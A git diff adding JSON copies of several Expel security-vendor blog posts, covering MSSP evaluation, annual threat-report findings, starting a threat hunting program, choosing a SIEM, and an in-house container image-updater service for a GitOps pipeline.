engineers and managers, ask what they\u2019ve learned since they started. What technical and non-technical growth have they experienced and how has this helped them grow their careers? Who supported this growth and how much did the company do to help? Are there programs in place to encourage this development? The more a company does to invest in its employees, the more likely it is that those employees will be investing in improving the service you receive. 12. In search of self-assessment \u2013 look out for hubris We started this blog talking about some iconic names in technology like AOL and Apple. Do you remember when AOL \u201cbought\u201d Time Warner? 
Have you seen what happens to technology companies that become so full of themselves they feel like you\u2019re obligated to buy their stuff? That only lasts so long. This is a difficult area to assess but an important one. If everyone you talk to is convinced they\u2019re the best at everything they do, that\u2019s a warning sign. If everyone is taking themselves a little too seriously, there might not be enough room for fallibility. If it\u2019s \u201cour way or the highway\u201d and compromise is out of the question, then that provider probably isn\u2019t a good fit for you. These warning signs create blinders for an organization, making it difficult for them to see when they\u2019ve done something wrong and learn from that mistake. What if we\u2019re wrong about all of this? Perhaps we\u2019re wrong about what it takes to maintain a culture that generates quality over time. But we do know this for certain: When you\u2019re evaluating an MSSP, you should walk away feeling pretty confident that over the course of your working relationship you\u2019ll both get better together. Or maybe you\u2019re sitting there wondering what our answers would be for some of these questions. Well, you\u2019re welcome to ask \u2026 or maybe in the not-too-distant future, we\u2019ll publish some of them right here." +} \ No newline at end of file diff --git a/2023-great-expeltations-report-top-six-findings.json b/2023-great-expeltations-report-top-six-findings.json new file mode 100644 index 0000000000000000000000000000000000000000..87654f14dc99d02d57afd02d3d9ec74c4f1172ba --- /dev/null +++ b/2023-great-expeltations-report-top-six-findings.json @@ -0,0 +1,6 @@ +{ + "title": "2023 Great eXpeltations report: top six findings", + "url": "https://expel.com/blog/2023-great-expeltations-report-top-six-findings/", + "date": "Jan 31, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG 2023 Great eXpeltations report: top six findings Security operations \u00b7 2 MIN READ \u00b7 BEN BRIGIDA \u00b7 JAN 31, 2023 \u00b7 TAGS: MDR Bad news: 2022 was a big year in cybersecurity. Good news: We stopped a lot of attacks. Better news: We sure learned a lot, didn\u2019t we? We just released our Great eXpeltations annual report, which details the major trends we saw in the security operations center (SOC) last year\u2026and what you can do about them this year. You can grab your copy now , and here\u2019s a taste of what you\u2019ll find. Top findings from the Great eXpeltations report 1: Business email compromise (BEC) accounted for half of all incidents, and remains the top threat facing our customers. This finding is consistent with what we saw in 2021. Key numbers: Of the BEC attempts we identified: more than 99% were in Microsoft 365 (M365\u2014previously known as Office 365, or O365) and fewer than 1% occurred in Google Workspace. Fifty-three percent of all organizations experienced at least one BEC attempt, and one organization was targeted 104 times throughout the year. 2: Threat actors started moving away from authenticating via legacy protocols to bypass multi-factor authentication (MFA) in M365. Instead, the bad guys have adopted frameworks such as Evilginx2, facilitating adversary-in-the-middle (AiTM) phishing attacks to steal login credentials and session cookies for initial access and MFA bypass. FIDO2 (Fast ID Online 2) and certificate-based authentication stop AiTM attacks. However, many organizations don\u2019t use FIDO factors for MFA. 3: Threat actors targeted Workday to perpetrate payroll fraud. 
In July, our SOC team began seeing BEC attempts, across multiple customer environments, seeking illicit access to human capital management systems\u2014specifically, Workday. The goal of these attacks? Payroll and direct deposit fraud. Once hackers access Workday, they modify a compromised user\u2019s payroll settings to add their direct deposit information and redirecting the victim\u2019s paycheck into the attacker\u2019s account. (Which is just evil.) The lesson? Enforce MFA within Workday and implement approval workflows for changes to direct deposit information. 4: Eleven percent of incidents could have resulted in deployment of ransomware if we hadn\u2019t intervened. This represents a jump of seven percentage points over 2021. Microsoft has made it easier to block macros in files downloaded from the internet , so ransomware threat groups and their affiliates are abandoning use of visual basic for application (VBA) macros and Excel 4.0 macros to break into Windows-based environments. Instead, they\u2019re now using disk image (ISO), short-cut (LNK), and HTML application (HTA) files. Here are some stats we find interesting: Hackers used zipped JavaScript files to gain initial access in 44% of all ransomware incidents. ISO files were used to gain initial access in 12% of all ransomware incidents. This attack vector didn\u2019t make our list in 2021. Nine percent of all ransomware incidents started with an infected USB drive. 5: Six percent of business application compromise (BAC) attempts used push notification fatigue to satisfy MFA. Push notification fatigue occurs when attackers send repeated push notifications until the targeted employee \u201cauthorizes\u201d or \u201caccepts\u201d the request. This allows the attacker to satisfy MFA. (Hackers may or may not have learned this technique from their four year-olds at home.) 6: Credential harvesters represented 88% of malicious email submissions. Credential theft via phishing continues to grow with identity the main focus of today\u2019s attacks. The top subject lines in malicious emails that resulted in an employee click or compromise were, \u201cIncoming Voice Message,\u201d \u201cChecking in,\u201d and \u201cVoice Mail Call received for .\u201d Our data shows that actionable, time-sensitive, and financially driven social engineering themes are most successful. The full report tells you more\u2014lots more\u2014 and provides insights and advice to help you defend against these threats. Give it a look and if you have questions drop us a line ." +} \ No newline at end of file diff --git a/3-must-dos-when-you-re-starting-a-threat-hunting-program.json b/3-must-dos-when-you-re-starting-a-threat-hunting-program.json new file mode 100644 index 0000000000000000000000000000000000000000..e0c5e5bc45c5492d31b58c4a66fe0012bbf150d6 --- /dev/null +++ b/3-must-dos-when-you-re-starting-a-threat-hunting-program.json @@ -0,0 +1,6 @@ +{ + "title": "3 must-dos when you're starting a threat hunting program", + "url": "https://expel.com/blog/3-must-dos-when-starting-threat-hunting-program/", + "date": "Aug 13, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 3 must-dos when you\u2019re starting a threat hunting program Security operations \u00b7 4 MIN READ \u00b7 KATE DREYER \u00b7 AUG 13, 2019 \u00b7 TAGS: How to / Hunting / Planning / SOC / Threat hunting This is a recap of a talk two of our Expletives gave at Carbon Black\u2019s CB Connect in San Diego. 
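The move from macros to ISO, LNK, HTA and zipped JavaScript files described in finding 4 is easy to spot-check in a mail quarantine or downloads folder. A small illustrative sketch follows; the extension list is not a complete inventory of risky types and the quarantine path is an assumption.

```python
import zipfile
from pathlib import Path

# File types called out above as common ransomware initial-access vectors.
RISKY_EXTENSIONS = {".iso", ".lnk", ".hta", ".js", ".vbs"}

def risky_attachment(path: Path) -> list:
    """Return the reasons a file looks like a risky delivery vehicle, if any."""
    reasons = []
    suffix = path.suffix.lower()
    if suffix in RISKY_EXTENSIONS:
        reasons.append("direct %s file" % suffix)
    if suffix == ".zip" and zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as archive:
            for name in archive.namelist():
                if Path(name).suffix.lower() in RISKY_EXTENSIONS:
                    reasons.append("archive contains %s" % name)
    return reasons

# Hypothetical quarantine directory; point this wherever attachments land.
for attachment in sorted(Path("quarantine").glob("*")):
    for reason in risky_attachment(attachment):
        print("%s: %s" % (attachment.name, reason))
```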
Let us know what Qs you\u2019ve got about threat hunting \u2014 drop us a note or message us on Twitter to chat. So you\u2019ve decided you want to build a threat hunting program, but where do you start? There are several paths you can follow in building a threat hunting program. And, depending on what your hunting goals are, there are lots of options for how to hunt and what tools to use. However, figuring out exactly what approach is going to achieve your outcomes is often challenging too, especially when there are loads of fancy new tools being marketed at you every day and security buzzwords flying at you left and right. Our goal is to help you filter out the shiny stuff and think about the brass tacks of your program\u2014and what\u2019s going to make it (and you) successful. What Is Threat Hunting? Threat hunting is the process of creating a hypothesis, gathering past data, applying filtering criteria that supports the hypothesis, and investigating the leads that you generate. It\u2019s an important proactive way to look for attackers. If you\u2019ve got existing security tech, you can use that for threat hunting, or you can think about what tools you\u2019ll need to meet the goals of a new threat hunting program. And don\u2019t forget that using tools you already have and combining that data with other information\u2014like open-source intelligence\u2014is an option too. We recently put together a list of the pros and cons of using different security tech for threat hunting, which is a helpful read if you\u2019re wondering how to use the tech you already own to conduct a hunt, as well as finding new tech that can help you in generating hypotheses for successful threat hunting. Is Hunting Right For Your Org? There are plenty of reasons to start a threat hunting program. The biggest perk is that, when planned out and executed well, it\u2019ll provide you with an extra layer of security. However, like any investment it takes time and resources. And so you\u2019ll want to consider whether it\u2019s right for you and the business you\u2019re protecting. Before building your own threat hunting program, consider the risks facing your organization versus your available resources. For example, if you operate in a high-risk or highly-targeted environment\u2014maybe you work at a financial institution, a health facility or another company that stores large amounts of sensitive information about customers\u2014then hunting probably makes sense because there are plenty of adversaries who\u2019ll find your organization to be an attractive target. But if your organization\u2019s risk profile is medium- to low-risk, your time and budget might be better spent on less sophisticated threats like commodity malware. If you don\u2019t operate in a high-risk environment, hunting might distract you from things that should probably be higher on the priority list like implementing effective anti-phishing controls. 3 Tips As You Start Building Your Own Threat Hunting Program If you\u2019ve determined that you do want to build a threat hunting program, there are a couple considerations to mull over before knocking on your CISO\u2019s office door to ask for more people and budget. Think through your objectives, how you\u2019ll report on what you find and how you\u2019ll eventually scale your hunting program. Here are our three must-dos before you start a threat hunting program and how you can determine what information and technology to include within yours. 
Must-do 1: Know Your Threat Hunting Objectives Before you start talking about what tech you\u2019ll use for hunting or how many people you\u2019ll need, figure out what you\u2019re trying to accomplish and why. With threat hunting, you\u2019re assuming that something has already failed and you\u2019ve been compromised. So as you\u2019re defining your objectives, make sure to: Validate your existing controls: Your objective is to validate existing security controls. This means your hunting hypothesis should be focused on an attacker that\u2019s already bypassed one or more of your security controls to get into your network. Where are there known (or suspected) vulnerabilities, or what controls have failed in the past? Assess the quality of your alert management and triage capabilities: Threat hunting is a great way to perform Quality Assurance (QA) on your alert management and triage efforts. You probably want to have someone reviewing the hunt results who didn\u2019t spend a ton of time in the past month reviewing alerts. You\u2019ll want to run techniques where the hypothesis is looking for activity where you would\u2019ve expected alerts to be generated. A good example here could be looking for suspicious powershell usage. Identify notable events in your environment: If you\u2019re hunting, the goal doesn\u2019t always have to be to identify threats. Notable events are events that your hunting techniques identified that were previously unknown. You might uncover policy violations like discovering unauthorized software, or you may find activities that software or employees performed that you (or your team or customer) didn\u2019t know about. Evolve your detection libraries: If you have hunting techniques in place, a long-term goal is to figure out ways to make them high enough fidelity without losing their value so that they can become detections. Similarly, if you have detections that are too prone to false positives, think about how you can build a hypothesis around them and turn them into hunting techniques. Must-do 2: Decide How and What Information to Report On After defining your objectives, think about how you\u2019ll report on the findings from your hunts. Not only that, but also consider who you\u2019re going to brief on those insights. For example, what hunt technique are you using and why? What data did you review and what did you discover? Then talk about the outcome of your hunt, including what steps you should take\u2014if any\u2014to make your org more resilient in the future. Must-do 3: Consider Long-Term Scaling of the Program Conducting a first successful hunt is great, but how do you plan to make threat hunting part of your ongoing security practices going forward? Can you maintain an effective threat hunting program with the resources you have today or do you need new tech or more people? Think about what scale looks like based on your goals and the business\u2019s needs. Be prepared to have a conversation about all of your ideas on future scaling of your threat hunting program with your CISO or team lead. Have More Questions About Threat Hunting? To learn how Expel can help with your threat hunting program, contact us ." 
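Must-do 1 calls out suspicious PowerShell usage as a good first hypothesis, so here is a minimal sketch of what that hunt can look like over process-creation records. The field names and the sample events are assumptions made up for the example; map them to whatever your EDR actually exports.

```python
# Fragments commonly seen in suspicious PowerShell command lines. Not exhaustive.
SUSPICIOUS_FRAGMENTS = [
    "-encodedcommand", "-enc ", "downloadstring", "invoke-expression",
    "-windowstyle hidden", "-nop",
]

def hunt(events):
    """Yield (hostname, command line, matched fragments) for PowerShell processes."""
    for event in events:
        if "powershell" not in event.get("process_name", "").lower():
            continue
        cmdline = event.get("command_line", "").lower()
        hits = [fragment for fragment in SUSPICIOUS_FRAGMENTS if fragment in cmdline]
        if hits:
            yield event.get("hostname", "?"), cmdline, hits

# In practice these records come from an EDR or logging-pipeline export.
sample_events = [
    {"hostname": "wkstn-12", "process_name": "powershell.exe",
     "command_line": "powershell.exe -nop -WindowStyle Hidden -EncodedCommand SQBFAFgA..."},
    {"hostname": "wkstn-07", "process_name": "powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\temp"},
]

for host, cmdline, hits in hunt(sample_events):
    print(host, "matched", hits)
```

A technique like this starts life as a hunt; once the noise is understood, it becomes a candidate to graduate into a detection, which is exactly the "evolve your detection libraries" objective above.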
+} \ No newline at end of file diff --git a/3-steps-to-figuring-out-where-a-siem-belongs-in-your.json b/3-steps-to-figuring-out-where-a-siem-belongs-in-your.json new file mode 100644 index 0000000000000000000000000000000000000000..cd491309c60e9c947e02565d6f9d66e3f2e9171c --- /dev/null +++ b/3-steps-to-figuring-out-where-a-siem-belongs-in-your.json @@ -0,0 +1,6 @@ +{ + "title": "3 steps to figuring out where a SIEM belongs in your ...", + "url": "https://expel.com/blog/3-steps-to-figuring-out-where-siem-belongs-in-security-program/", + "date": "Sep 22, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 3 steps to figuring out where a SIEM belongs in your security program Tips \u00b7 9 MIN READ \u00b7 MATT PETERS, DAN WHALEN AND PETER SILBERMAN \u00b7 SEP 22, 2020 \u00b7 TAGS: MDR / SIEM / Tech tools Spin up a conversation about someone\u2019s security operations and chances are the conversation will quickly move to their security information and event management (SIEM) tool. A SIEM can play an important role in your security strategy. But figuring out where it belongs (and what type of SIEM is best for you) depends on a few things. So, where to begin? We\u2019ve pinpointed three steps that can help you figure out where a SIEM fits within your security program. This post walks you through each of these steps and we hope it will help you decide what makes the most sense for you, your team and your business. Step 1: Figure out where you are on your SIEM journey Working with different customers, we\u2019ve seen most orgs fall into one of three different categories. Which one are you? Just getting started Maybe you\u2019re just starting to get serious about security or you reached an inflection point and are looking for a SIEM to take your security program to the next level. You\u2019re optimistic about the prospects of a SIEM and how it can help address some of your pain points, whether that\u2019s addressing visibility gaps or keeping your auditors happy! As you explore all of the SIEM options out there, you\u2019re pretty quickly realizing there are a ton of opportunities (especially around automation) but it\u2019s also hard to get a handle on what factors should influence your decision. You may also be wondering: if it\u2019s so easy to automate why isn\u2019t everyone doing this successfully? You\u2019re excited to bring in a SIEM and up level your team but you\u2019re also wondering what pitfalls you should avoid and how to steer clear of a path that will end up costing too much and bogging down your team with low value work. Doubling down You\u2019ve had a SIEM or two (or three) and know what it takes to keep it singing. You\u2019ve learned through trial and error what works, what doesn\u2019t and the level of investment (people and money) you need internally (or through third-party partners ) to accomplish your use cases. You\u2019ve also had time to really figure out what use cases matter to you. All of those flashy selling points you thought would be a great value add? You\u2019ve come to terms with the fact that many of them aren\u2019t for you. You know what you want of your SIEM and are looking to get the most you can with your existing investment \u2013 this could mean dedicating internal resources to managing your SIEM or looking outward for help. Disillusioned skeptic You aren\u2019t sold on the tale that a SIEM can solve all of your security woes and you aren\u2019t afraid to talk about it. How did you get here? 
It may have had something to do with your past experiences \u2013 you\u2019ve tried to make a SIEM work in the past and have gotten burned . Maybe the product (or products) didn\u2019t do what you wanted, or it ended up costing way more than you could justify. Regardless, you now view your security program more holistically and don\u2019t see a SIEM as the single source of truth. Sure, there are use cases where it makes sense (you may still have a SIEM kicking around in a corner for your application and OS logs) but you\u2019re reluctant to hinge the success of your security program on a single solution. You prefer to rely on your various security products and services to get you the visibility and response capabilities you need to be successful. Now that you\u2019ve figured out where you are in the SIEM journey, it\u2019s time to move on to the next step! Step 2: Determine what use cases are most important to you No matter where you are in your journey, it\u2019s important to clarify (and often re-clarify) what you \u2018re expecting your SIEM to do. You can make a SIEM do just about anything with enough effort (and consultants and money) and that\u2019s exactly what many organizations have done. Don\u2019t know where to begin? Consider the following use cases and who (you or a third-party) you envision taking responsibility: Use Case Description Examples Compliance and reporting Do you have regulatory requirements for retaining certain types of data? A SIEM could help you aggregate all of this required data and make it easy to satisfy audit requirements. ISO 27001 certification Threat Detection Depending on the maturity of your security program, you may have the need/desire to write your own detection rules. A SIEM can provide these capabilities, but also requires a definite investment in content management. Consider if you want to invest in internal teams to write and maintain detection rules or whether you want to leverage security products or services to accomplish this use case. You want to invest in a team to build custom detections for your unique application data You want alerts, but don\u2019t want to be responsible for content. (This is when you may want to look to products or services like Expel !) Investigative support A SIEM can be a powerful investigative tool if it\u2019s fed with the right data and given the love and attention it needs. Using a SIEM for investigation is a very common use case, whether you\u2019re investing in an internal team or partnering with a third party to respond to your alerts. For this use case, consider how easy it is to add new log sources and how intuitive/fast searching that data is. An easy and fast search capability will empower your analysts to get to the bottom of an alert without unnecessary frustration. Building an internal security team that investigates with your SIEM Partnering with a third party like Expel to investigate with your SIEM Response Automation Containing and remediating an incident can be challenging, especially in large enterprise environments. If this is a challenge for your organization, consider how you can apply technology to this problem. Some SIEM technologies have built in response capabilities or SOAR integrations that can help in this area. As you explore these options, pay close attention to the level of effort required to configure these tools and make sure your investment will actually help solve your problem. Also consider who you want to be responsible for managing the tool (you vs third party). 
Splunk with Phantom integration A SOAR tool like Demisto Case Management Who did what and when? As your security program matures, process becomes more important. Once you have multiple analysts responsible for responding to alerts, knowing \u201cwho\u2019s got it\u201d and how issues were resolved helps you understand what\u2019s happening across the environment. You can communicate that upwards to drive change. As you think about this use case, you\u2019ll need to decide where you want incident management to occur \u2013 is it in your SIEM, a ticketing system or is a partner/third-party service responsible for managing alerts? Splunk with Enterprise Security serving as an incident management tool A ticketing system like Jira or ServiceNow Step 3: Know what type of SIEM you have (or want) Finally, whether you have a SIEM or are going shopping for one, it\u2019s important to first understand use cases. Once you identify your needs, you can figure out which SIEMs are best for you. Traditional SIEM Traditional SIEMs are typically large, multifunction applications. They tend to have highly structured data models (think SQL vs full text indexing) which enable certain types of use cases but make others more difficult. If given proper care, they can be very powerful but often aren\u2019t very flexible to changing requirements over time. Sample Vendors: QRadar, ArcSight, LogRhythm What are they good at? Highly opinionated data models make querying data and writing detections easy (once you understand the data model) One \u201cright\u201d way to do things keeps things relatively simple (accessibility is often better) Often come with a lot of out-of-the-box features for detection, compliance and reporting Strong incident management feature sets are a good candidate for \u201csingle source of truth\u201d Products have been around for a long time and are generally mature and stable What are some common pain points? Hampered solutions (limited by opinionated data models/vendor\u2019s way of doing things) For on-prem installations, management can be a significant investment, so you need to plan for that Slower to accommodate new use cases/features and can become \u201cbehind the times\u201d Search-based SIEM Search-based SIEMs are essentially a log aggregation and search tool first with other features added on top of that core function. They have flexible data models and everything is driven by a search from rules to reporting and dashboards. But they often require a lot of expertise to satisfy certain use cases (like detection) \u2013 meaning you\u2019ve got to live and breathe their search language to see value. Sample Vendors: Splunk ES, Sumo Logic, Exabeam What are they good at? Strong investigative support due to powerful search capabilities Flexible and accommodating for new use cases Often easier to manage (particularly for cloud-based/SaaS products) What are some common pain points? Incident management feature sets often lag behind traditional SIEMs as they have a less structured data model Requires expertise to accomplish your use cases (you need to be an expert in their search language) DIY SIEM TL;DR \u2013 you\u2019re starting from scratch. DIY SIEM options are usually open source projects organizations invest in and build additional tooling around. These options offer a lot of flexibility and can be much more cost effective; however, they require a significant investment in engineering and in-house security expertise to build out security use cases. 
Sample Vendors: Elastic stack, OSSIM What are they good at? Potential long-term cost savings (if you have significant in-house expertise to build and manage!) Flexibility: You have complete control over the solution and can build out the use cases you need What are some common pain points? Organizations often realize they\u2019ve \u201cbitten off more than they can chew\u201d in terms of engineering and security expertise required to build and manage a DIY SIEM On-going operational cost of maintenance is on your internal team instead of a third party, which potentially distracts you from the things that are important to your business Open source options are often significantly limited in feature sets and deployment size May not be compatible with security services (if you ever choose to partner) No SIEM Some organizations forgo a SIEM altogether. This may be an option in cases where your use cases can be satisfied with other existing tools or partnerships with third party services. For example, if you have no regulatory requirements and have limited log sources (perhaps a few SaaS applications) there may be no good reason to invest heavily in a SIEM if a third party like Expel can address your use cases directly! Sample Vendors: Expel and other similar MSSP/MDRs/XDRs What are the advantages of forgoing SIEM? One less security tool you have to pay for Reduced complexity and less responsibility What are some reasons you might need a SIEM? Regulatory requirements You have use cases your existing products and services can\u2019t accomplish (like writing rules against your custom application logs or helping your internal teams investigate issues) What\u2019s your next step? There\u2019s a lot to consider as you think (or re-think) how a SIEM should fit into your security program. By identifying where you\u2019re in your SIEM journey (and where you want to go), prioritizing use cases and choosing the right SIEM product, you can set your team up for long term success. There\u2019s likely no \u201cone-size-fits-all\u201d solution, but here are some common models we\u2019ve seen: SIEM model cheat sheet ( steal me! ) Decentralized model Some organizations do not have a significant need or desire to invest in a SIEM. These organizations may still have a SIEM off in a corner somewhere for a very specific purpose, but it is not central to their security program. Instead, security signal is often consumed directly from security products or from a third-party monitoring service like Expel. Hybrid model A SIEM can help layer additional capabilities on top of existing security controls. A hybrid approach (where a SIEM is used in combination with other security tools) can help deliver capabilities that are \u201cbest of both worlds.\u201dAs an example, many organizations choose to use their SIEM for investigation and compliance, but rely on their security products for detections and a ticketing system for incident management. A service like Expel in this model can help by integrating with all of the various sources of signal directly while leveraging the capabilities of the SIEM to provide visibility across the environment. Centralized model (single pane of glass) In this model, the SIEM is the center of the organization\u2019s security program. The organization is investing significantly in their SIEM and wants it to be the place where everything happens \u2013 from alerting to response and incident management. 
This model requires expertise, either internal or third party (like a co-managed SIEM service) to succeed. It also requires that all security signals be routed through the SIEM for detection and response. This is an expensive but effective approach for large security teams that have the resources to go this route. Organizations considering this approach should consider their use cases carefully and ensure the long-term investment is worth it! In many cases, the same use cases can be accomplished with a hybrid approach at a lower cost. Parting thoughts We\u2019ve seen all of these models work. Your decision depends on what makes sense for your business. The key to success is understanding what is important to you and what options you have in front of you. We\u2019ve gone through this very process at Expel and hope this framework can work for you too! Want to talk to someone before making a decision about your information security? Let\u2019s chat ." +} \ No newline at end of file diff --git a/45-minutes-to-one-minute-how-we-shrunk-image-deployment.json b/45-minutes-to-one-minute-how-we-shrunk-image-deployment.json new file mode 100644 index 0000000000000000000000000000000000000000..42d47d75d6c83e549b0cb77109b2959bdeee9338 --- /dev/null +++ b/45-minutes-to-one-minute-how-we-shrunk-image-deployment.json @@ -0,0 +1,6 @@ +{ + "title": "45 minutes to one minute: how we shrunk image deployment ...", + "url": "https://expel.com/blog/how-we-shrunk-image-deployment-time/", + "date": "Dec 13, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG 45 minutes to one minute: how we shrunk image deployment time Engineering \u00b7 5 MIN READ \u00b7 BJORN STANGE \u00b7 DEC 13, 2022 \u00b7 TAGS: Tech tools We use a GitOps workflow. In practice, this means that all of our infrastructure is defined in YAML (either plain or templated YAML using jsonnet) and continuously applied to our Kubernetes (k8s) cluster using Flux. Initially, we set up Flux v1 for image auto updates. This meant that in addition to applying all the k8s manifests from our Git repo to the cluster, Flux also watched our container registry for new tags on certain images and updated the YAML directly in that repo. This seems great on paper, but in practice it ended up not scaling very well. One of my first projects when I joined Expel was to improve the team\u2019s visibility into the health of Flux. It was one of the main reasons that other teams came to the #ask-core-platform Slack channel for help. Here are a few such messages: Is Flux having issues right now? I made an env var change to both staging and prod an hour ago and I\u2019m not seeing it appear in the pods, even after restarting them Could someone help me debug why my auto deploys have stopped? Hi team, Flux isn\u2019t deploying the latest image in staging Hi! Is Flux stuck again? Waiting 30m+ on a deploy to staging Deployment smoketest We decided to build a deployment smoketest after realizing that Flux wasn\u2019t providing enough information about its failure states. This allowed us to measure the time between when an image was built and when it went live in the cluster. We were shocked to find that it took Flux anywhere between 20 to 45 minutes to find new tags that had been pushed to our registry and update the corresponding YAML file. (To be clear, Flux v1 is no longer maintained and has been replaced with Flux v2.) These scalability issues were even documented by the Flux v1 team. (Those docs have since been taken down, otherwise I would link them.) 
I believe it was because we had so many tags in Google Container Registry (GCR), but the lack of visibility into the inner workings of the Flux image update process meant that we couldn\u2019t reach any definitive conclusions. We were growing rapidly, teams were shipping code aggressively, and more and more tags were added to GCR every day. We\u2019re at a modest size (~350 images and ~40,000 tags). I did some pruning of tags older than one year to help mitigate the issue, but that was only a temporary fix to hold us over until we had a better long-term solution. The other failure state we noticed was that sometimes invalid manifests found their way into our repo. This would result in Flux not being able to apply changes to the cluster, even after the image had been updated in the YAML. This scenario was usually pretty easy to diagnose and fix since the logs made it clear what was failing to apply. Flux also exposes Prometheus metrics that show how many manifests were successfully and unsuccessfully applied to the cluster, so creating an alert for this is straightforward. Neither the Flux logs nor the metrics had anything to say about the long registry scan times, though. Image updater We decided to address the slow image auto-update behavior by writing our own internal service. Initially, I thought we should just include some Bash scripts in CircleCI to perform the update (we got a proof-of-concept working in a day) but decided against it as a team since it wouldn\u2019t provide the metrics/observability we wanted. We evaluated ArgoCD and Flux v2, but decided that it would be better to just write something in-house that did exactly what we wanted. We had hacked together a solution to get Flux v1 to work with our jsonnet manifests and workflow, but it wasn\u2019t so easy to do with the image-update systems that came with ArgoCD and Flux v2. Also, we wanted more visibility/metrics around the image update process. Design and architecture This relatively simple service does text search + replace in our YAML/jsonnet files, then pushes a commit to the main branch. We decided to accomplish this using a \u201ckeyword comment\u201d so we\u2019d be able to find the files, and the lines within those files, to update. Here\u2019s what that looks like in practice for YAML and jsonnet files. image: gcr.io/demo-gcr/demo-app:0.0.1 # expel-image-automation-prod local staging_image = 'gcr.io/demo-gcr/demo-app:staging-98470dcc'; // expel-image-automation-staging local prod_image = 'gcr.io/demo-gcr/demo-app:0.0.1'; // expel-image-automation-prod We also decided to use an \u201cevent-based\u201d system, instead of one that continuously polls GCR. The new system would have to be sent a request by CircleCI to trigger an \u201cimage update.\u201d The new application would have two components, each with its own responsibilities. We decided to write this in Go, since everyone on the team was comfortable maintaining an internal Go service (we already maintain a few). Server The server would be responsible for receiving requests over HTTP and updating a database with the \u201cdesired\u201d tag of an image, and which repo and branch we\u2019re working with. The requests and responses are JSON, for simplicity. We use Kong to provide authentication to the API. Syncer The syncer is responsible for implementing most of the \u201clogic\u201d of an image update. 
It first finds all \u201cout of sync\u201d images in the database, then it clones all repos/branches it needs to work with, then does all the text search/replace using regex, and then pushes a commit with the changes to GitHub. We decided to use ripgrep to find all the files because it would be much faster than anything we would implement ourselves. We try to batch all image updates into a single commit, if possible. The less often we have to perform a git pull, git commit, and git push, the faster we\u2019ll be. The syncer will find all out of date images and update them in a single commit. If this fails for some reason, then we fall back to trying to update one image at a time and creating a commit + pushing + pulling for each image. This is how image-updater fits into our GitOps workflow today. Improvements Performance Performance is obviously the main benefit here. The image update operation takes, on average, two to four seconds. From clicking release on GitHub to traffic being served by the new replica set usually takes around seven minutes (including running tests/building the docker image, and waiting for the two- minute Flux cluster sync loop). The image-update portion of that takes only one sync loop, which runs every minute. Hence, 45 minutes to one \ud83d\ude42. We\u2019re still migrating folks off of Flux and onto image-updater, but as far as we can tell, things are humming away smoothly and the developers can happily ship their code to staging and production without having to worry about whether Flux will find their new image. Observability The nice thing about writing your own software is that you can implement logging and metrics exactly how you\u2019d like. We now have more visibility into our image update pipeline than ever. We implemented tracing to give us more granular visibility into how long it takes our sync jobs to run. This allows us to identify bottlenecks in the future if we ever need to, as we can see exactly how long each operation takes (git pull, git commit, find files to update, perform the update, git push, etc). As expected, the git pull and push operations are the most expensive. We also have more visibility into which images are getting pushed through our system. We implemented structured logging that follows the same pattern as the rest of the Go applications at Expel. We now know exactly if/when images fail to get updated and why, via metrics and logs. jsonnet This system natively supports jsonnet, our preferred method of templating our k8s YAML. Flux v1 did not natively support jsonnet. We even made a few performance improvements to the process that renders our YAML along the way. Plans for the future Flux v1 is EOL so we\u2019re planning on moving to ArgoCD to perform the cluster sync operation from GitHub. We prototyped ArgoCD already and really like it. We\u2019ve got a bunch of ideas for the next version of image updater, including a CLI, opening a pull request with the change instead of just committing directly to main, and integrating with Argo Rollouts to automatically roll back a release if smoketests fail." 
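To ground the search-and-replace step described above, here is a minimal sketch of the core idea: find lines that carry the expel-image-automation keyword comment for a given environment and reference a given image, then rewrite the tag in place. The function names and the standard-library file walk are illustrative assumptions for this post; as noted earlier, the real service shells out to ripgrep and batches all updates into a single commit.

package main

import (
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// updateImageTag rewrites any YAML/jsonnet line under root that references
// image and carries the keyword comment for env (e.g. expel-image-automation-prod)
// so that it points at newTag. It returns the files it modified.
func updateImageTag(root, image, newTag, env string) ([]string, error) {
	keyword := "expel-image-automation-" + env
	re := regexp.MustCompile(regexp.QuoteMeta(image) + ":[A-Za-z0-9._-]+")

	var changed []string
	err := filepath.WalkDir(root, func(path string, d os.DirEntry, walkErr error) error {
		if walkErr != nil || d.IsDir() {
			return walkErr
		}
		if !(strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".jsonnet") || strings.HasSuffix(path, ".libsonnet")) {
			return nil
		}
		data, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		lines := strings.Split(string(data), "\n")
		dirty := false
		for i, line := range lines {
			// Only touch lines explicitly opted in via the keyword comment.
			if strings.Contains(line, keyword) && re.MatchString(line) {
				lines[i] = re.ReplaceAllString(line, image+":"+newTag)
				dirty = true
			}
		}
		if !dirty {
			return nil
		}
		if err := os.WriteFile(path, []byte(strings.Join(lines, "\n")), 0o644); err != nil {
			return err
		}
		changed = append(changed, path)
		return nil
	})
	return changed, err
}

func main() {
	files, err := updateImageTag(".", "gcr.io/demo-gcr/demo-app", "0.0.2", "prod")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Println("updated:", files)
}

From there, committing and pushing the changed files is ordinary git work, which the syncer batches into as few commits as possible for the reasons described above.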
